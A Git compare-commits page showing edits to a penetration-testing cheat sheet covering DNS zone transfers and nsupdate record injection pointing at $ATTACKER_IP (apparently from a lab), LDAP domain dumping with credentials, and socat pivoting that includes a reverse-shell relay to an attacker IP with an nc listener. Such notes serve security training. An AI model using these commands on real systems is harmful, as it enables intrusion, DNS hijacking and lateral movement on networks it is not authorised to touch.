whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Compare commits

base: whx:3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83
Branches Tags
whx:master
..
compare: whx:74e0c3e76a886c164c955ca0d8f79bbbb258d1d3
Branches Tags
whx:master

No commits in common. "3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83" and "74e0c3e76a886c164c955ca0d8f79bbbb258d1d3" have entirely different histories.
3f066cb663 ... 74e0c3e76a

3 changed files with 34 additions and 47 deletions
Show Stats Expand all files Collapse all files

14
Enumeration/DNS.md
View File

@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr
``` ```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. * [subrake](https://github.com/hash3liZer/Subrake.git)
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain ## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk * Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh ```sh
nsupdate nsupdate
server <DNS-IP> server <DNS-IP>
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
send send
quit quit
``` ```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. * Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys ### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh ```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret> nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key... Creating key...
@ -34,10 +34,10 @@ namefromtext
keycreate keycreate
server <domain> server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send send
``` ```
*Hint*: Copy the lines, every space counts as it has to be exactly like in the example Copy the lines, every space counts as it has to be exactly like in the example

5
Enumeration/LDAP.md
View File

@ -2,7 +2,6 @@
## Get Domain ## Get Domain
Use the `ldapsearch` tool to receive information from an LDAP server.
```sh ```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
``` ```
@ -17,8 +16,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o
## Domain Dump ## Domain Dump
If a set of LDAP credentials is known dump the domain via * If a set of credentials are known via
```sh ```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
``` ```
The result is a set of HTML files, take a look at them. * Take a look at the genreated HTML files

62
Post Exploitation/Pivoting.md
View File

@ -92,49 +92,37 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
### Socat ### Socat
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
* Reverse shell on target via * Reverse shell on target via
```sh ```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 & ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
``` ```
* Attacking bind shell on attacker * Attacking bind shell
```sh ```sh
sudo nc -lvnp 443 sudo nc -lvnp 443
``` ```
#### Jumpserver via Socat * Relay on jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Relay on a jumpserver via * Quiet Port Forwarding
```sh * On attacker
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 & ```sh
``` socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
#### Quiet Port Forwarding Through a Relay Server via Socat * Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
#### Forward Local Port via Socat
* In need of a Download on target, expose a port on the attacker via relay * In need of a Download on target, expose a port on the attacker via relay
```sh ```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80 socat tcp-l:80,fork tcp:$ATTACKER_IP:80
``` ```
### Chisel ### Chisel